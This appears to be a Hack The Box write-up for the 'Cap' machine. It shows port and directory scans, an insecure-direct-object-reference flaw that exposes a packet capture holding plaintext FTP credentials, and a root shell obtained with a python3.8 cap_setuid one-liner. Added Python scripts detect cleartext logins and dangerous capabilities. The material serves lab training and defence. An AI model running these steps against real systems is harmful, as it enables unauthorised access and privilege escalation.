Hacking the matrix, one phish at a time

Cap – HTB Writeup


Reconnaissance

Port Scanning

First we scan with nmap to see how many ports are open:

nmap -p- -sS --min-rate 5000 -n -Pn -vvv 10.129.13.81 -oG allPorts
  • -p-: Scan all 65535 ports
  • -sS: Perform a SYN stealth scan
  • --min-rate 5000: Send packets at a minimum rate of 5000 per second
  • -n: Disable DNS resolution
  • -Pn: Skip host discovery (treat host as online)
  • -vvv: Very verbose output level
  • -oG allPorts: Save results in greppable format to file “allPorts”
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 63
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Then we identify the version of the service on each open port and run some basic nmap scripts against them:

nmap -p21,22,80 -sCV -Pn 10.129.13.81 -oN target
  • -p21,22,80: Scan only ports 21, 22, and 80
  • -sC: Run default NSE scripts for service detection
  • -sV: Detect service versions on open ports
  • -Pn: Skip host discovery (treat host as online)
  • -oN target: Save results in normal format to file “target”
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    Gunicorn
|_http-server-header: gunicorn
|_http-title: Security Dashboard
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

All we learn so far is that there are FTP, SSH and HTTP services running.

Let's start with the web.

Web scan

We run gobuster to search for files and directories:

gobuster dir -u http://10.129.13.81/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,bak,old,txt,json,xml,config -t 200 2>/dev/null
  • dir: Directory/file enumeration mode
  • -u http://10.129.13.81/: Target URL to scan
  • -w: Wordlist file path for brute-forcing directories and files
  • -x php,bak,old,txt,json,xml,config: File extensions to append during enumeration
  • -t 200: Number of concurrent threads to use
  • 2>/dev/null: Redirect error output to null (suppress errors)

That results in this:

data                 (Status: 302) [Size: 208] [--> http://10.129.13.81/]
ip                   (Status: 200) [Size: 17452]
netstat              (Status: 200) [Size: 58355]
capture              (Status: 302) [Size: 220] [--> http://10.129.13.81/data/2]

ip and netstat are rabbit holes: they look like potential command injection, but they are not.

The capture endpoint seems to take a snapshot of the network traffic and display it at the /data endpoint under a number that increases each time we take a snapshot.

We notice that we can change that number to access other captures. All of them contain packets with no data, but if we use the number 0, we reach a capture that does contain some data.

We can download it and inspect it with tshark.

Pcap analysis

We look at the content of the capture:

tshark -r 0.pcap
  • -r: Read packet data from a specified capture file
  • 0.pcap: Name of the packet capture file to read and analyze

And we see some credentials in plaintext:

   36   4.126500 192.168.196.1  192.168.196.16 FTP 69 Request: USER nathan
   37   4.126526 192.168.196.16  192.168.196.1 TCP 56 21  54411 [ACK] Seq=21 Ack=14 Win=64256 Len=0
   38   4.126630 192.168.196.16  192.168.196.1 FTP 90 Response: 331 Please specify the password.
   39   4.167701 192.168.196.1  192.168.196.16 TCP 62 54411  21 [ACK] Seq=14 Ack=55 Win=1051136 Len=0
   40   5.424998 192.168.196.1  192.168.196.16 FTP 78 Request: PASS B*********
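From a defender's side, the useful takeaway from this capture is that a plaintext FTP login is trivially visible to anyone who can read the traffic. The following is an added example (not part of the original writeup) that parses tshark's one-line summary output and flags cleartext FTP logins per client/server pair, correlating the USER request, the PASS request and the server's 230 reply. The password itself is deliberately never stored, only the fact that it was sent in the clear. The sample lines are constructed: the FTP frames mirror the ones shown above (password redacted as on the page), and the extra TCP/HTTP frames are made up to show that unrelated traffic is ignored.

```python
import re
from dataclasses import dataclass

# Constructed sample in the format of `tshark -r 0.pcap` summary lines.
# Frames 36-40 mirror the writeup's output; 35, 41 and 50 are invented filler.
SAMPLE_TSHARK = """\
   35   4.100000 192.168.196.1  192.168.196.16 TCP 66 54411  21 [SYN] Seq=0 Win=64240 Len=0
   36   4.126500 192.168.196.1  192.168.196.16 FTP 69 Request: USER nathan
   37   4.126526 192.168.196.16  192.168.196.1 TCP 56 21  54411 [ACK] Seq=21 Ack=14 Win=64256 Len=0
   38   4.126630 192.168.196.16  192.168.196.1 FTP 90 Response: 331 Please specify the password.
   39   4.167701 192.168.196.1  192.168.196.16 TCP 62 54411  21 [ACK] Seq=14 Ack=55 Win=1051136 Len=0
   40   5.424998 192.168.196.1  192.168.196.16 FTP 78 Request: PASS B*********
   41   5.430000 192.168.196.16  192.168.196.1 FTP 77 Response: 230 Login successful.
   50   9.000000 192.168.196.1  192.168.196.16 HTTP 200 GET /data/0 HTTP/1.1
"""

# frame  time  src  dst  proto  length  info
LINE_RE = re.compile(
    r"^\s*(?P<frame>\d+)\s+(?P<time>[\d.]+)\s+(?P<src>\S+)\s+(?P<dst>\S+)\s+"
    r"(?P<proto>\S+)\s+(?P<length>\d+)\s+(?P<info>.*)$"
)


@dataclass
class CleartextLogin:
    client: str
    server: str
    user: str
    password_seen: bool = False     # a PASS command was observed in the clear
    login_succeeded: bool = False   # server answered 230 to this session


def parse_summary(text):
    """Split tshark summary lines into dicts; lines that do not match are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rows.append(m.groupdict())
    return rows


def find_cleartext_ftp_logins(text):
    """Return one CleartextLogin per FTP USER seen, enriched with PASS/230 evidence."""
    sessions = {}   # (client, server) -> CleartextLogin
    findings = []
    for row in parse_summary(text):
        if row["proto"] != "FTP":
            continue
        info = row["info"]
        if info.startswith("Request: USER "):
            key = (row["src"], row["dst"])
            sessions[key] = CleartextLogin(row["src"], row["dst"], info.split(" ", 2)[2])
            findings.append(sessions[key])
        elif info.startswith("Request: PASS "):
            # Only record that a password crossed the wire; never keep its value.
            key = (row["src"], row["dst"])
            if key in sessions:
                sessions[key].password_seen = True
        elif info.startswith("Response: 230"):
            # Replies flow server -> client, so the session key is reversed.
            key = (row["dst"], row["src"])
            if key in sessions:
                sessions[key].login_succeeded = True
    return findings


if __name__ == "__main__":
    for f in find_cleartext_ftp_logins(SAMPLE_TSHARK):
        print(f"cleartext FTP login {f.client} -> {f.server} user={f.user} "
              f"password_seen={f.password_seen} success={f.login_succeeded}")
```

Pointing this at real output (`tshark -r capture.pcap | python3 ftp_cleartext.py` with a small stdin wrapper) gives an inventory of accounts whose passwords have already been exposed and therefore need rotating; the fix on the server side is to serve FTPS or SFTP instead, and not to expose stored captures without an ownership check.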

We log in to the machine over SSH with those credentials and obtain the user flag.

Privilege Escalation

We search for capabilities and we find something really interesting:

getcap -r / 2>/dev/null
  • -r: Recursively search through directories
  • /: Starting directory path (root in this case)
  • 2>/dev/null: Redirect error output to null (suppress errors)

We find the cap_setuid capability on python3.8:

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

Abusing Capabilities

GTFOBins lists a simple command to get a shell by abusing that capability.

python3.8 -c 'import os; os.setuid(0); os.execl("/bin/sh", "sh")'
  • -c: Execute the command string that follows
  • import os: Import the os module to access operating system functionality
  • os.setuid(0): Set the user ID to 0 (root)
  • os.execl("/bin/sh", "sh"): Replace the current process with a new shell process

By doing this, we first set our user ID to 0 (root) and then execute a shell, which therefore runs as root.
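The same `getcap -r /` sweep is exactly what a hardening or detection job should run periodically, because a capability like cap_setuid on a general-purpose interpreter is an instant root path. Below is an added example (my own code, not from the writeup or from GTFOBins) that parses getcap output, flags dangerous capabilities, ranks them higher when the binary is an interpreter, and emits the corresponding `setcap -r` removal command. The sample output is constructed: the python3.8 line is the one from the writeup, the other entries are typical benign ones I added for contrast. Both the older `path = caps+flags` and the newer `path caps=flags` getcap formats are handled.

```python
import re

# Constructed sample of `getcap -r / 2>/dev/null` output. Only the python3.8
# line comes from the writeup; the rest are typical, harmless entries.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

# Capabilities that on their own let a process escalate or bypass DAC.
DANGEROUS_CAPS = {
    "cap_setuid": "can switch to UID 0",
    "cap_setgid": "can switch to any group",
    "cap_dac_override": "bypasses file permission checks",
    "cap_dac_read_search": "can read any file",
    "cap_sys_admin": "broad administrative power",
    "cap_sys_ptrace": "can attach to any process",
    "cap_sys_module": "can load kernel modules",
    "cap_chown": "can change file ownership",
    "cap_fowner": "bypasses owner checks",
}

# Binaries that execute arbitrary user-supplied code, so any dangerous
# capability on them is directly usable (as python3.8 is on this box).
INTERPRETER_RE = re.compile(r"(python|perl|ruby|node|php|lua|gdb|vim)[\d.]*$")

SPEC_RE = re.compile(r"^([a-z_,]+)[+=]([eip]+)$")


def parse_getcap(text):
    """Yield (path, [cap names], flags) for each getcap output line."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if " = " in line:                       # older libcap: "path = caps+flags"
            path, spec = line.split(" = ", 1)
        else:                                   # newer libcap: "path caps=flags"
            path, spec = line.split(None, 1)
        m = SPEC_RE.match(spec.strip())
        if m:
            entries.append((path, m.group(1).split(","), m.group(2)))
    return entries


def audit_capabilities(text):
    """Return findings for dangerous capabilities; interpreters rank critical."""
    findings = []
    for path, caps, flags in parse_getcap(text):
        for cap in caps:
            if cap not in DANGEROUS_CAPS:
                continue
            name = path.rsplit("/", 1)[-1]
            severity = "critical" if INTERPRETER_RE.search(name) else "high"
            findings.append({
                "path": path,
                "cap": cap,
                "why": DANGEROUS_CAPS[cap],
                # 'e' in the flags means the capability is already effective at
                # exec time; with only 'p' the program would have to raise it first.
                "effective": "e" in flags,
                "severity": severity,
                "fix": f"setcap -r {path}",
            })
    return findings


if __name__ == "__main__":
    for f in audit_capabilities(SAMPLE_GETCAP):
        print(f"[{f['severity']}] {f['path']}: {f['cap']} ({f['why']}), "
              f"effective={f['effective']} -> {f['fix']}")
```

Run on a real host with `getcap -r / 2>/dev/null | python3 capaudit.py` (adding a stdin read in place of the sample) and treat any critical finding as a confirmed root path; if the service genuinely needs to bind a low port, keep only cap_net_bind_service on it and drop cap_setuid.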

Conclusion

This machine demonstrated a straightforward attack path combining IDOR vulnerability exploitation and Linux capabilities abuse. By accessing an unprotected packet capture through predictable numbering, we obtained FTP credentials in plaintext that granted SSH access. Privilege escalation was achieved by leveraging the cap_setuid capability on Python 3.8, allowing us to spawn a root shell. The machine emphasizes the importance of proper access controls on sensitive data, secure credential transmission, and careful capability assignment to system binaries.

Video Walkthrough

Here is a video in Spanish walking through this machine:

https://youtu.be/B9ZvaEyoWZQ
